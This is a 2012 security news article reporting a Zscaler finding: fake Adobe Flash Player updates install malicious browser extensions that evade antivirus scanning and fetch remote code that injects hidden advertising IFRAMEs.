Phony add-ons are not detected by AV engines because they’re text files

Jun 23, 2012 10:03 GMT  ·  By

Because of its popularity, Adobe Flash Player is still an application that’s preferred by cybercriminals for campaigns that involve fake updates.

A new scheme discovered by Zscaler experts begins with a shady website that displays a phony video window which urges users to install Adobe Flash Player in order to view a clip.

The update is actually a fake extension for web browsers. Depending on the application the victim is running, he/she is presented with a .XPI file (Firefox), a .CRX file (Google Chrome), or a .exe (Internet Explorer).

Once installed, these extensions allow the attacker to gain access to the infected machine.

However, this is not the main concern. The problem is that most antivirus solutions are unable to detect malicious extensions because they’re basically text files. While the executable is easily identified as being a threat, the .XPI and the .CRX are not appointed as being dangerous by any of the AV engines from VirusTotal.

Another thing worth mentioning is the fact that fake browser add-ons don’t contain malicious code. Instead, they fetch and execute the code that causes the actual damage when the browser is launched.

“The current files being pulled are not very dangerous, but that could change in the future. An invisible IFRAME is inserted in each new page loaded. The IFRAME contains advertising from resultsz.com, and contains a username in the URL,” Zscaler’s Julien Sobrier explained.

He believes that the adware’s creator makes a profit by generating traffic towards a specific website.

“The author could change the remote file at any moment to do much more harm, like stealing cookies to obtain access to the user accounts on any site, stealing username/credentials being entered or previously saved, etc,” he concluded.

So, the best thing you can do to protect yourself against such threats is to avoid downloading shady updates from untrusted websites.